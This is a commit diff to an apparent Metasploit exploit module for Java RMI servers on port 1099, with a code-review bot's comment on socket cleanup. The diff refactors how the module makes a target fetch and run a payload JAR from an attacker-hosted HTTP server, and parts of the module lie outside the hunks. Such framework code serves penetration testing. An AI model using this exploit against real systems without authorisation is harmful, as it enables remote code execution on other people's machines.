Use primer
parent
0bcb99c47d
commit
73ce4cbeaa
|
@ -8,8 +8,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
|
@ -76,14 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||
register_options([
|
||||
Opt::RPORT(1099),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
], self.class)
|
||||
|
||||
register_autofilter_ports([ 1098, 1099 ])
|
||||
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||
end
|
||||
|
||||
def exploit
|
||||
start_service()
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, fail and
|
||||
# don't wait WfsDelay
|
||||
fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
|
||||
end
|
||||
end
|
||||
|
||||
def primer
|
||||
connect
|
||||
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
|
@ -106,11 +122,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf = ""
|
||||
1.upto(6) do
|
||||
res = sock.get_once(-1, 5) rescue nil
|
||||
break if not res
|
||||
break unless res
|
||||
break if session_created?
|
||||
buf << res
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if buf =~ /RMI class loader disabled/
|
||||
fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
|
||||
end
|
||||
|
@ -120,14 +138,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_good("Target #{rhost}:#{rport} may be exploitable...")
|
||||
|
||||
# Wait for the request to be handled
|
||||
1.upto(120) do
|
||||
break if session_created?
|
||||
select(nil, nil, nil, 0.25)
|
||||
handler()
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
@ -148,6 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
print_status("Replied to request for payload JAR")
|
||||
stop_service
|
||||
end
|
||||
end
|
||||
|
||||
|
|
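Review bot: The `Timeout.timeout(datastore['HTTPDELAY'])` wrapper in `exploit` can fire while `primer` is still between its `connect` and `disconnect` calls — the `1.upto(6)` loop around `sock.get_once(-1, 5)` can block well past the 10 s HTTPDELAY default if that 5 is a per-read timeout — and because `disconnect` is not in an `ensure`, the RMI socket is left open when Timeout::Error unwinds through `super`. Consider closing it before failing, e.g. `rescue Timeout::Error` / `disconnect if sock` / `fail_with(Failure::Unknown, "The HTTP Server didn't get a payload request")`, which also fixes the "a payload requests" wording in the new message. The explicit `start_service()` before `super` looks redundant if the HttpServer mixin's `exploit` (reached via `super`) already starts the service and calls `primer` itself — worth confirming against the mixin before relying on a double start being harmless. `primer` is cut across several hunks here and its body continues outside them.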